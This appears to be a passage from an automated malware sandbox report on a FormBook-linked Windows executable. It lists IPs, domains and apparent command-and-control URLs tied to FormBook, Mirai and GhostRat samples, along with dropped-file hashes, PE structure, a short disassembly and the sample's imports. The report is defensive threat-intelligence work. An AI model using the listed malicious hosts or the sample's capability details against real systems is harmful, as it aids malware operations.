	TU0kiz3mxz.exe	Get hash	malicious	FormBook	Browse	www.cleans.xyz/m25s/?uTm8l=sq9EZiryngIYllrGGegSwTPcoSeG1wK7r99iAR3vBwBIUuCUohOmEZYbiast2lA9LyAZ&eN9dz=nR-4vpW
	QUOTATION#050125.exe	Get hash	malicious	FormBook	Browse	www.bonheur.tech/t3iv/
	QUOTATION#050125.exe	Get hash	malicious	FormBook	Browse	www.bonheur.tech/t3iv/
103.21.221.87	CV Lic H&S Olivetti Renzo.exe	Get hash	malicious	FormBook	Browse	www.rtpterbaruwaktu3.xyz/mv7p/
	CV Lic H&S Olivetti Renzo.exe	Get hash	malicious	FormBook	Browse	www.rtpterbaruwaktu3.xyz/mv7p/
	P030092024LANDWAY.exe	Get hash	malicious	FormBook	Browse	www.rtpterbaruwaktu3.xyz/v6un/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ymx01.cn	ZAMOWIEN.BAT.exe	Get hash	malicious	FormBook, GuLoader	Browse	8.210.46.21
	CV Lic H&S Olivetti Renzo.exe	Get hash	malicious	FormBook	Browse	8.210.46.21
	CV Lic H&S Olivetti Renzo.exe	Get hash	malicious	FormBook	Browse	8.210.46.21
www.fortevision.xyz	CV Lic H&S Olivetti Renzo.exe	Get hash	malicious	FormBook	Browse	13.248.169.48
www.fortevision.xyz	CV Lic H&S Olivetti Renzo.exe	Get hash	malicious	FormBook	Browse	13.248.169.48
all.wjscdn.com	ORDER-401.exe	Get hash	malicious	FormBook	Browse	154.205.159.116
	01152-11-12-24.exe	Get hash	malicious	FormBook	Browse	154.90.58.209
	DRAFT COPY BL, CI & PL.exe	Get hash	malicious	FormBook	Browse	154.90.58.209
	New Order.exe	Get hash	malicious	FormBook	Browse	154.90.35.240
	TNT Express Delivery Consignment AWD 87993766479.vbs	Get hash	malicious	FormBook	Browse	38.54.112.227
	Payment-251124.exe	Get hash	malicious	FormBook	Browse	154.205.159.116
	CV Lic H&S Olivetti Renzo.exe	Get hash	malicious	FormBook	Browse	38.54.112.227
	CV Lic H&S Olivetti Renzo.exe	Get hash	malicious	FormBook	Browse	154.90.58.209
www.ytsd88.top	W3MzrFzSF0.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	47.76.213.197
	Quotation sheet.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	47.76.213.197
	CV Lic H&S Olivetti Renzo.exe	Get hash	malicious	FormBook	Browse	47.76.213.197
	CV Lic H&S Olivetti Renzo.exe	Get hash	malicious	FormBook	Browse	47.76.213.197
	PO #2411071822.exe	Get hash	malicious	FormBook	Browse	47.76.213.197
	Quotation.exe	Get hash	malicious	FormBook	Browse	47.76.213.197
	payments.exe	Get hash	malicious	FormBook	Browse	47.76.213.197
	Quotation request -30112024_pdf.exe	Get hash	malicious	FormBook	Browse	47.76.213.197

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
VODAFONE-TRANSIT-ASVodafoneNZLtdNZ	FIWszl1A8l.exe	Get hash	malicious	GhostRat	Browse	47.79.66.76
	armv5l.elf	Get hash	malicious	Unknown	Browse	47.79.173.144
	arm7.elf	Get hash	malicious	Mirai, Moobot	Browse	121.74.70.74
	leBwnyHIgx.exe	Get hash	malicious	GhostRat	Browse	47.79.48.230
	miori.arm5.elf	Get hash	malicious	Unknown	Browse	47.78.226.190
	miori.spc.elf	Get hash	malicious	Unknown	Browse	118.95.51.101
	z0r0.sh4.elf	Get hash	malicious	Mirai	Browse	121.74.70.74
	armv4l.elf	Get hash	malicious	Unknown	Browse	118.95.125.90
	HGwpjJUqhW.exe	Get hash	malicious	GhostRat	Browse	47.79.48.211
	1731043030539.exe	Get hash	malicious	ReflectiveLoader	Browse	47.76.199.218
LINKNET-ID-APLinknetASNID	sora.mpsl.elf	Get hash	malicious	Unknown	Browse	139.10.29.3
	arm4.elf	Get hash	malicious	Mirai	Browse	139.44.142.78
	momo.arm7.elf	Get hash	malicious	Mirai	Browse	139.41.98.162
	armv5l.elf	Get hash	malicious	Mirai	Browse	139.34.88.220
	DEMONS.ppc.elf	Get hash	malicious	Unknown	Browse	139.16.152.234
	loligang.arm.elf	Get hash	malicious	Mirai	Browse	139.10.78.207
	loligang.mpsl.elf	Get hash	malicious	Mirai	Browse	139.24.67.215
	powerpc.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	139.35.229.59
	x86.elf	Get hash	malicious	Mirai, Moobot	Browse	139.255.236.155
	la.bot.mips.elf	Get hash	malicious	Mirai	Browse	139.33.26.167
CNSERVERSUS	QmBbqpEHu0.exe	Get hash	malicious	FormBook	Browse	172.247.112.164
	arm.elf	Get hash	malicious	Mirai	Browse	23.225.101.86
	spc.elf	Get hash	malicious	Mirai	Browse	23.225.150.24
	sh4.elf	Get hash	malicious	Mirai	Browse	23.225.149.53
	6.elf	Get hash	malicious	Unknown	Browse	41.216.185.130
	3.elf	Get hash	malicious	Unknown	Browse	41.216.185.178
	2.elf	Get hash	malicious	Unknown	Browse	41.216.185.126
	http://www.rr8844.com	Get hash	malicious	Unknown	Browse	23.224.82.187
	botx.mpsl.elf	Get hash	malicious	Mirai	Browse	23.225.125.76
	armv4l.elf	Get hash	malicious	Mirai	Browse	103.228.168.192
AMAZON-02US	EIvidclKOb.exe	Get hash	malicious	FormBook	Browse	13.228.81.39
	invoice_AG60538.pdf	Get hash	malicious	Unknown	Browse	143.204.205.214
	bkTW1FbgHN.exe	Get hash	malicious	FormBook	Browse	18.139.62.226
	OVZizpEU7Q.exe	Get hash	malicious	FormBook	Browse	54.244.188.177
	QmBbqpEHu0.exe	Get hash	malicious	FormBook	Browse	13.248.169.48
	frosty.arm.elf	Get hash	malicious	Mirai	Browse	18.140.171.98
	frosty.spc.elf	Get hash	malicious	Mirai	Browse	54.189.236.62
	Message.eml	Get hash	malicious	Unknown	Browse	34.249.87.52
	frosty.sh4.elf	Get hash	malicious	Mirai	Browse	18.188.126.130
	cNDddMAF5u.exe	Get hash	malicious	FormBook	Browse	13.248.169.48

Process:	C:\Windows\SysWOW64\winver.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1211596417522893
Encrypted:	false
SSDEEP:	192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8wH0hL3kWieF:r2qOB1nxCkvSAELyKOMq+8wH0hLUZs
MD5:	0AB67F0950F46216D5590A6A41A267C7
SHA1:	3E0DD57E2D4141A54B1C42DD8803C2C4FD26CB69
SHA-256:	4AE2FD6D1BEDB54610134C1E58D875AF3589EDA511F439CDCCF230096C1BEB00
SHA-512:	D19D99A54E7C7C85782D166A3010ABB620B32C7CD6C43B783B2F236492621FDD29B93A52C23B1F4EFC9BF998E1EF1DFEE953E78B28DF1B06C24BADAD750E6DF7
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\aut482C.tmp

Download File

Process:	C:\Users\user\Desktop\aBEh0fsi2c.exe
File Type:	packed data
Category:	dropped
Size (bytes):	288256
Entropy (8bit):	7.994807312517926
Encrypted:	true
SSDEEP:	6144:dVqtcuj5pmyVLlQJT2A3max4TvjXn4CeLWfgSAi1+qtnX57T6Loj:LuFQ3x4glLWfgSAi1htnpvIoj
MD5:	0BB697E046F67A8E0A3CC79C0D365B6B
SHA1:	81951876C28897FC2BDFD39F4D94B5B4C18EDCA1
SHA-256:	71838F3FFE2BE533C88E5EFDA130772A302EE7687F4F6F128C0854DDF8D13168
SHA-512:	0210D18BC6A7577DA3B87B2F85B1D5CFDC774877AA05008463511B6407B545D99F2F523DAFEB2C8186FA589BE3FFA8CE56ED05E6B2712DEE5729AEE4538B3EF1
Malicious:	false
Reputation:	low
Preview:	...U2J3NTNTC..3T.ENNOEFQu0YHLRDLU1J3NPNTCYN3TEENNOEFQ50YHLRD.U1J=Q.@T.P...D..o.-/".@+'+ %!uR+] ?:t!<nA!+e' o....]6,)\|IA_.J3NPNTC O:.x%).r%!..P>.V..oQ-.T...9).N..r/"..\S1u,5.LU1J3NPN..YN.UDE2...FQ50YHLR.LW0A2EPN.GYN3TEENNOuSQ50IHLR4HU1JsNP^TCYL3TCENNOEFQ30YHLRDLUAN3NRNTCYN3VE..NOUFQ%0YHLBDLE1J3NPNDCYN3TEENNOEFQ50YHLRDLU1J3NPNTCYN3TEENNOEFQ50YHLRDLU1J3NPNTCYN3TEENNOEFQ50YHLRDLU1J3NPNTCYN3TEENNOEFQ50YHLRDLU1J3NPNTCYN3TEENNOEFQ50w<)*0LU1.`JPNDCYNgPEE^NOEFQ50YHLRDLU.J3.PNTCYN3TEENNOEFQ50YHLRDLU1J3NPNTCYN3TEENNOEFQ50YHLRDLU1J3NPNTCYN3TEENNOEFQ50YHLRDLU1J3NPNTCYN3TEENNOEFQ50YHLRDLU1J3NPNTCYN3TEENNOEFQ50YHLRDLU1J3NPNTCYN3TEENNOEFQ50YHLRDLU1J3NPNTCYN3TEENNOEFQ50YHLRDLU1J3NPNTCYN3TEENNOEFQ50YHLRDLU1J3NPNTCYN3TEENNOEFQ50YHLRDLU1J3NPNTCYN3TEENNOEFQ50YHLRDLU1J3NPNTCYN3TEENNOEFQ50YHLRDLU1J3NPNTCYN3TEENNOEFQ50YHLRDLU1J3NPNTCYN3TEENNOEFQ50YHLRDLU1J3NPNTCYN3TEENNOEFQ50YHLRDLU1J3NPNTCYN3TEENNOEFQ50YHLRDLU1J3NPNTCYN3TEENNOEFQ50YHLRDLU1J3NPNTCYN3TEENNOEFQ50YHLRDLU1J3NPNTCYN3TEENNOEFQ50YHLRDLU1J3NPNTCYN

C:\Users\user\AppData\Local\Temp\scroll

Download File

Process:	C:\Users\user\Desktop\aBEh0fsi2c.exe
File Type:	packed data
Category:	dropped
Size (bytes):	288256
Entropy (8bit):	7.994807312517926
Encrypted:	true
SSDEEP:	6144:dVqtcuj5pmyVLlQJT2A3max4TvjXn4CeLWfgSAi1+qtnX57T6Loj:LuFQ3x4glLWfgSAi1htnpvIoj
MD5:	0BB697E046F67A8E0A3CC79C0D365B6B
SHA1:	81951876C28897FC2BDFD39F4D94B5B4C18EDCA1
SHA-256:	71838F3FFE2BE533C88E5EFDA130772A302EE7687F4F6F128C0854DDF8D13168
SHA-512:	0210D18BC6A7577DA3B87B2F85B1D5CFDC774877AA05008463511B6407B545D99F2F523DAFEB2C8186FA589BE3FFA8CE56ED05E6B2712DEE5729AEE4538B3EF1
Malicious:	false
Reputation:	low
Preview:	...U2J3NTNTC..3T.ENNOEFQu0YHLRDLU1J3NPNTCYN3TEENNOEFQ50YHLRD.U1J=Q.@T.P...D..o.-/".@+'+ %!uR+] ?:t!<nA!+e' o....]6,)\|IA_.J3NPNTC O:.x%).r%!..P>.V..oQ-.T...9).N..r/"..\S1u,5.LU1J3NPN..YN.UDE2...FQ50YHLR.LW0A2EPN.GYN3TEENNOuSQ50IHLR4HU1JsNP^TCYL3TCENNOEFQ30YHLRDLUAN3NRNTCYN3VE..NOUFQ%0YHLBDLE1J3NPNDCYN3TEENNOEFQ50YHLRDLU1J3NPNTCYN3TEENNOEFQ50YHLRDLU1J3NPNTCYN3TEENNOEFQ50YHLRDLU1J3NPNTCYN3TEENNOEFQ50YHLRDLU1J3NPNTCYN3TEENNOEFQ50w<)*0LU1.`JPNDCYNgPEE^NOEFQ50YHLRDLU.J3.PNTCYN3TEENNOEFQ50YHLRDLU1J3NPNTCYN3TEENNOEFQ50YHLRDLU1J3NPNTCYN3TEENNOEFQ50YHLRDLU1J3NPNTCYN3TEENNOEFQ50YHLRDLU1J3NPNTCYN3TEENNOEFQ50YHLRDLU1J3NPNTCYN3TEENNOEFQ50YHLRDLU1J3NPNTCYN3TEENNOEFQ50YHLRDLU1J3NPNTCYN3TEENNOEFQ50YHLRDLU1J3NPNTCYN3TEENNOEFQ50YHLRDLU1J3NPNTCYN3TEENNOEFQ50YHLRDLU1J3NPNTCYN3TEENNOEFQ50YHLRDLU1J3NPNTCYN3TEENNOEFQ50YHLRDLU1J3NPNTCYN3TEENNOEFQ50YHLRDLU1J3NPNTCYN3TEENNOEFQ50YHLRDLU1J3NPNTCYN3TEENNOEFQ50YHLRDLU1J3NPNTCYN3TEENNOEFQ50YHLRDLU1J3NPNTCYN3TEENNOEFQ50YHLRDLU1J3NPNTCYN3TEENNOEFQ50YHLRDLU1J3NPNTCYN

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.2115039335106275
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	aBEh0fsi2c.exe
File size:	1'183'744 bytes
MD5:	ae1fe8e567226c914dc9a747e25d2118
SHA1:	70db43d604ed9a6da5afb4982d2f0cca238632bd
SHA256:	9351f03cc5e661bf7eb9e279c67c11f05ea78c2cc6c283691218ab43c3e15a06
SHA512:	c7cec826372b746a16894fdea3efd0eec706bfaa097762b3a34c197b6bfeacbfeb8a8c6f3e1d5e9fb017328011518eb4ef8981f784d24950b19fbcb5130824e9
SSDEEP:	24576:5u6J33O0c+JY5UZ+XC0kGso6FaDP4J8D1cyx16DWY:7u0c++OCvkGs9FaDQK1dY
TLSH:	4C45CE2273DEC360CB679173BF69B3056EBF78650630B85B2F980D79A950171262C7A3
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.

File Icon


Icon Hash:	1bb3b3b3b3d389b3

Static PE Info

General

Entrypoint:	0x427dcd
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x675C5E25 [Fri Dec 13 16:17:41 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	afcdf79be1557326c854b6e20cb900a7

Entrypoint Preview

Instruction
call 00007F9208DAB10Ah
jmp 00007F9208D9DED4h
int3
int3
int3
int3
int3
int3
int3
int3
int3
push edi
push esi
mov esi, dword ptr [esp+10h]
mov ecx, dword ptr [esp+14h]
mov edi, dword ptr [esp+0Ch]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007F9208D9E05Ah
cmp edi, eax
jc 00007F9208D9E3BEh
bt dword ptr [004C31FCh], 01h
jnc 00007F9208D9E059h
rep movsb
jmp 00007F9208D9E36Ch
cmp ecx, 00000080h
jc 00007F9208D9E224h
mov eax, edi
xor eax, esi
test eax, 0000000Fh
jne 00007F9208D9E060h
bt dword ptr [004BE324h], 01h
jc 00007F9208D9E530h
bt dword ptr [004C31FCh], 00000000h
jnc 00007F9208D9E1FDh
test edi, 00000003h
jne 00007F9208D9E20Eh
test esi, 00000003h
jne 00007F9208D9E1EDh
bt edi, 02h
jnc 00007F9208D9E05Fh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007F9208D9E063h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007F9208D9E0B5h
bt esi, 03h
jnc 00007F9208D9E108h

Rich Headers

Programming Language:

[ASM] VS2013 build 21005
[ C ] VS2013 build 21005
[C++] VS2013 build 21005
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ASM] VS2013 UPD4 build 31101
[RES] VS2013 build 21005
[LNK] VS2013 UPD4 build 31101

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xba44c	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc7000	0x586d4	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x120000	0x711c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x92bc0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xa4870	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8f000	0x884	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x8dcc4	0x8de00	d28a820a1d9ff26cda02d12b888ba4b4	False	0.5728679102422908	data	6.676118058520316	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8f000	0x2e10e	0x2e200	79b14b254506b0dbc8cd0ad67fb70ad9	False	0.33535526761517614	OpenPGP Public Key	5.76010872795207	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xbe000	0x8f74	0x5200	9f9d6f746f1a415a63de45f8b7983d33	False	0.1017530487804878	data	1.198745897703538	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xc7000	0x586d4	0x58800	2c08d5b9a8f21f6a3142e9f435cb3254	False	0.9749459304378532	data	7.970284768155938	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x120000	0x711c	0x7200	6fcae3cbbf6bfbabf5ec5bbe7cf612c3	False	0.7650767543859649	data	6.779031650454199	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xc7458	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xc7580	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xc76a8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xc77d0	0x151a	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	Great Britain	0.8863383931877082
RT_MENU	0xc8cec	0x50	data	English	Great Britain	0.9
RT_STRING	0xc8d3c	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xc92d0	0x68a	data	English	Great Britain	0.2747909199522103
RT_STRING	0xc995c	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xc9dec	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xca3e8	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xcaa44	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xcaeac	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xcb004	0x541b1	data			1.000336722816164
RT_GROUP_ICON	0x11f1b8	0x14	data	English	Great Britain	1.2
RT_GROUP_ICON	0x11f1cc	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0x11f1e0	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0x11f1f4	0x14	data	English	Great Britain	1.25
RT_VERSION	0x11f208	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0x11f2e4	0x3ef	ASCII text, with CRLF line terminators	English	Great Britain	0.5074478649453823

Imports

DLL	Import
WSOCK32.dll	WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll	GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll	WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll	InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll	DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll	IsThemeActive
KERNEL32.dll	DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll	AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll	StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll	GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll	GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll	DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
